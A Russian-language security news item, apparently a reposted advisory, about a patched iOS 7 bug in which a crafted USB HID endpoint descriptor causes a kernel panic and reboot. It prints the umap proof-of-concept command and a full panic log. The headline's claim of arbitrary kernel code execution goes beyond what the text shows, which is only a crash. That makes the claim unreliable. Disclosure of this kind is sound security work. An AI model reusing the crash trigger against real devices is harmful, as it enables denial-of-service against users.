Уязвимость в iOS 7 позволила выполнить произвольный код в режиме ядра, что привело к перезагрузке iPhone, Apple выпустила исправление

Когда все взгляды устремлены на будущее запуск iOS 8, исследователь безопасности обнаружил уязвимость высокого риска в текущей операционной системе, работающей на устройствах iPhone, iPad и iPod Touch. Согласно доказательству концепции, представленному исследователем безопасности Энди Дэвисом, он обнаружил уязвимость в iOS 7, которая позволяет выполнять произвольный код в режиме ядра с высоким риском. Как только этот код выполняется, ядро устройства iOS вызывает панику и перезагружается.

• *

Энди представил доказательство концепции компании Apple Inc 26 сентября 2013 года, и, наконец, 10 марта 2014 года Apple выпустила патч для устранения этой уязвимости. Весь код доступен на Github. Краткая информация о выполнении приведена ниже :

Описание уязвимости

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Когда в дескрипторе USB Endpoint для устройства HID передается конкретное значение

ядро устройства Apple вызывает панику и перезагружается

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Технические детали

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Ошибка может быть вызвана с использованием umap (https://github.com/nccgroup/umap)

как показано ниже:

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Идентификатор инцидента: F0856C91-7616-4DAC-9907-C504401D9951

Ключ CrashReporter: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

Модель оборудования: iPhone3,1

Дата/время: 2013-09-26 12:35:46.892 +0100

Версия ОС: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Сообщение отладчика: panic

Версия ОС: 11A465

Версия ядра: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

Версия iBoot: iBoot-1940.1.75

безопасная загрузка?: ДА

Версия Paniclog: 1

Сдвиг ядра: 0x0000000008200000

Базовый текст ядра: 0x88201000

Эпоха времени: сек. мкс

Загрузка : 0x52441b69 0x00000000

Сон : 0x00000000 0x00000000

Пробуждение : 0x00000000 0x00000000

Календарь: 0x52441bb5 0x00056497 Паниковавшая задача 0x896f8d48: 12856 страниц, 114 потоков: pid 0: kernel_task
паниковавший поток: 0x8023de90, трассировка: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Apple присвоила этой уязвимости номер ссылки 600217059 и выпустила патч для устранения уязвимости, который можно скачать здесь.

• *

Источник: CXSECURITY